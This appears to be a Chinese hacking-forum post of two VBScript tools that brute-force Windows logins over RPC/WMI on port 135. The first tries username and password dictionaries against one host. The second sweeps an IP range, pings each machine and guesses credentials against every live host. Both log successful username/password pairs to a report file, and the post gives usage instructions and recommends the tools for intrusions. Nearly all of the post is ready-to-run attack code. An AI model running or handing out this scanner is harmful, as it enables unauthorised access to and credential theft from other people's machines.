135端口扫弱口令的vbs((效率低下))
作者:lcx
来源:vbs小铺
On Error Resume Next set fso=CreateObject("Scripting.FileSystemObject") Function filenumshow(filename,i) Dim temparray if not fso.fileExists(filename) then exit Function set f = fso.opentextfile(filename,1) if not f.AtEndofStream then tempcnt = f.readall temparray = split(tempcnt,chr(13)&chr(10)) filenumshow=temparray(i) f.close End if End Function Function filenum(filename) Dim temparray if not fso.fileExists(filename) then exit Function set f = fso.opentextfile(filename,1) if not f.AtEndofStream then tempcnt = f.readall temparray = split(tempcnt,chr(13)&chr(10)) lineNum=ubound(temparray) filenum=lineNum f.close End if End Function For i=0 To filenum("c:\user.txt") user=filenumshow("c:\user.txt",i) If user="" Then Exit for For l=0 To filenum("c:\pass.txt") pass=filenumshow("c:\pass.txt",l) wscript.echo user&Space(5)&pass Call Scan("192.168.8.10",user,pass,"c:\log.txt") If Err.number=0 Then wscript.echo "find!!!" Exit For End if wscript.echo Err.number&Space(10)&Err.source&Space(10)&Err.Description Err.clear next Next Sub Scan(ipaddress,username,password,report) set objlocator=createobject("wbemscripting.swbemlocator") set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) Set colItems = objswbemservices.ExecQuery("Select * From Win32_OperatingSystem") with fso.opentextfile(report,8,true) .writeline "===================================================" For Each objItem in ColItems .writeline ipaddress & ": " & objItem.Caption Next .writeline "username:"&username .writeline "password:"&password .writeline "===================================================" .close end with end Sub set fso=nothing ++++++++++++++++++++++++++++++++++++++++++++++++++++++ Enjoy Penetration Testingon error resume nextif (lcase(right(wscript.fullname,11))="wscript.exe") then wscript.echo "Execute it under the cmd.exe Plz! Thx." wscript.quit end if if wscript.arguments.count<5 Then wscript.echo "RPC_Scan.vbs" wscript.echo "Code by NetPatch(www.icehack.com) 07.7.5" wscript.echo "Thx KVO,Lcx" wscript.echo "use: cscript "&wscript.scriptfullname&" Begin_Ip End_Ip User_dic Pass_dic Report_Path" wscript.quit end if Begin_IP=wscript.arguments(0) End_IP=wscript.arguments(1) User_Dic=wscript.arguments(2) Pass_Dic=wscript.arguments(3) Report_Path=wscript.arguments(4) S_Ip = Split(Begin_Ip, ".", -1, 1) E_Ip =Split(End_Ip, ".", -1, 1) If S_Ip(0) = E_Ip(0) And S_Ip(1) = E_Ip(1) And S_Ip(2) = E_Ip(2) And CInt(S_Ip(3)) <= CInt(E_Ip(3)) And CInt(E_Ip(3)) < 255 Then SE_Ip=S_Ip(0)&"."&S_Ip(1)&"."&S_Ip(2) Set objPings = GetObject("winmgmts:{impersonationLevel=impersonate}") set objlocator=createobject("wbemscripting.swbemlocator") For num=CInt(S_Ip(3)) To CInt(E_Ip(3)) aMachines = SE_Ip&"."&num Set objPing=objPings._ ExecQuery("select * from Win32_PingStatus where address = '"_ & aMachines & "'") For Each objStatus in objPing If IsNull(objStatus.StatusCode) or objStatus.StatusCode = 0 Then If user_dic <> "" Or pass_dic <> "" Then set fso=CreateObject("Scripting.FileSystemObject") Set file=fso.opentextfile(User_Dic,1,false) ok=false do while file.atendofline <> True user_dic=file.readline Set files=fso.opentextfile(Pass_Dic,1,false) do while files.atendofline <> True pass_dic=files.readline wscript.echo "Conneting "&aMachines&"...." wscript.echo "user:"&user_dic wscript.echo "pass:"&pass_dic call Scan(aMachines,User_Dic,Pass_Dic,Report_Path) If Err.Number = 0 Then Exit Do Err.clear Loop files.close Loop file.close set fso=nothing End If Else WScript.Echo(aMachines & " is not reachable") End If Next Next End if Sub Scan(ipaddress,username,password,report) set objWservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) Set colItems = objWservices.ExecQuery _ ("Select * From Win32_OperatingSystem") with fso.opentextfile(report,8,true) .writeline "===================================================" For Each objItem in ColItems .writeline ipaddress & ": " & objItem.Caption Next .writeline "username:"&username .writeline "password:"&password .writeline "===================================================" .close end with end sub
用法:
cscript RPC_Scan.vbs Begin_Ip End_Ip User_dic Pass_dic Report_Path
Begin_Ip //开始IP
End_Ip //结束IP
User_dic//用户列表
Pass_dic//密码档
Report_Path//输出报告路径
利用RPC(135端口进行密码猜解)
//渗透时比较好使.
